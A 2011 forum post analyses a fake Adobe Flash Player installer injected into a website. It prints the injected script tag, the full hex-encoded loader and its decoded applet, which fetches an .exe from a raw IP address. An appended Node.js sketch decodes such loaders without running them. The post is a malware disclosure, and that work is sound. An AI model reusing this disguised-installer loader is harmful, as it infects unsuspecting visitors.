Author Topic: Fake Adobe Flash Player  (Read 4237 times)


August 19, 2011, 03:27:43 pm

Weyne

This site opens a Java applet that simulates installation of Adobe Flash Player. Printscreen:
http://img18.imagevenue.com/img.php?image=11946_printscreen_122_546lo.jpg

The code is inserted in this post:
Code: [Select]
http://www.boaputaria.com/2011/08/17/casada-de-curitiba-com-2-caiu-na-net/
It runs from this script:
Code: [Select]
<script src=http://www.colegionovodamaia.pt/portal/images/.../is.js></script>
The script is encoded in hexadecimal:
Code: [Select]
document.write(unescape('%3C%61%70%70%6C%65%74%20%6E%61%6D%65%3D%22%41%64%6F%62%65%20%46%6C%61%73%68%20%50%6C%61%79%65%72%20%31%31%22%20%63%6F%64%65%3D%22%61%66%70%2E%63%6C%61%73%73%22%20%61%72%63%68%69%76%65%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%63%6F%6C%65%67%69%6F%6E%6F%76%6F%64%61%6D%61%69%61%2E%70%74%2F%61%66%70%2E%6A%61%72%22%20%77%69%64%74%68%3D%22%31%22%20%68%65%69%67%68%74%3D%22%31%22%3E%3C%70%61%72%61%6D%20%6E%61%6D%65%3D%22%6C%69%6E%6B%22%20%76%61%6C%75%65%3D%22%68%74%74%70%3A%2F%2F%32%31%37%2E%31%37%30%2E%31%2E%33%35%3A%31%30%31%30%2F%6A%78%76%2E%65%78%65%22%3E%3C%2F%61%70%70%6C%65%74%3E'));
Decoding to ASCII:
Code: [Select]
<applet name="Adobe Flash Player 11" code="afp.class" archive="http://www.colegionovodamaia.pt/afp.jar" width="1" height="1"><param name="link" value="http://217.170.1.35:1010/jxv.exe"></applet>
If the user accepts, the file jxv.exe will be installed.

jxv.exe is a virus:
http://www.virustotal.com/file-scan/report.html?id=5b13450bc8b7da15a50fdaaa86bf3877511ee960ae18617c217a0070f81eb54b-1313767053
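
The decoding step described in the post above, as an added example that is not part of the original post: a Node.js sketch that treats a `document.write(unescape('...'))` loader as data, decodes it without executing it, and summarises the `<applet>` tag it would write. The function names and the sample input (with `host.invalid` placeholder hosts) are constructed for illustration.

```javascript
// Added example: statically decode a document.write(unescape('...')) loader
// as data (nothing is executed) and summarise any <applet> tag it would write.
// All function names and the sample input below are constructed for illustration.

// Decode %XX and legacy %uXXXX escapes like unescape(), without evaluating anything.
function decodeEscapes(s) {
  return s.replace(/%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g,
    (_, u, h) => String.fromCharCode(parseInt(u || h, 16)));
}

// Collect every string literal passed to unescape() in the script source.
function extractPayloads(src) {
  const re = /unescape\(\s*(['"])((?:(?!\1).)*)\1\s*\)/g;
  return [...src.matchAll(re)].map(m => decodeEscapes(m[2]));
}

// Read name="value" pairs (double-quoted attributes only, as in the decoded tag).
function attrs(tag) {
  const o = {};
  for (const m of tag.matchAll(/([\w-]+)\s*=\s*"([^"]*)"/g)) o[m[1].toLowerCase()] = m[2];
  return o;
}

// Report each applet's archive, params, 1x1 "hidden" sizing and .exe-looking params.
function analyzeApplets(html) {
  const findings = [];
  for (const m of html.matchAll(/<applet\b([^>]*)>([\s\S]*?)<\/applet>/gi)) {
    const a = attrs(m[1]);
    const params = {};
    for (const p of m[2].matchAll(/<param\b([^>]*)>/gi)) {
      const pa = attrs(p[1]);
      if (pa.name) params[pa.name] = pa.value || "";
    }
    findings.push({
      name: a.name || "", code: a.code || "", archive: a.archive || "", params,
      hidden: Number(a.width) <= 1 && Number(a.height) <= 1,
      exeParams: Object.values(params).filter(v => /\.exe(\?|$)/i.test(v)),
    });
  }
  return findings;
}

function analyzeScript(src) { return extractPayloads(src).flatMap(analyzeApplets); }

// Constructed sample with the same shape as the post's script (placeholder hosts).
const sampleHtml = '<applet name="Fake Player" code="x.class" archive="http://host.invalid/x.jar" width="1" height="1"><param name="link" value="http://host.invalid/payload.exe"></applet>';
const sampleScript = "document.write(unescape('" + [...sampleHtml].map(
  c => "%" + c.charCodeAt(0).toString(16).toUpperCase().padStart(2, "0")).join("") + "'));";
console.log(JSON.stringify(analyzeScript(sampleScript), null, 2));
```

The `archive` value and any `exeParams` entries are the URLs worth blocking or searching for in proxy logs; `hidden: true` marks the 1x1 sizing seen in the decoded tag.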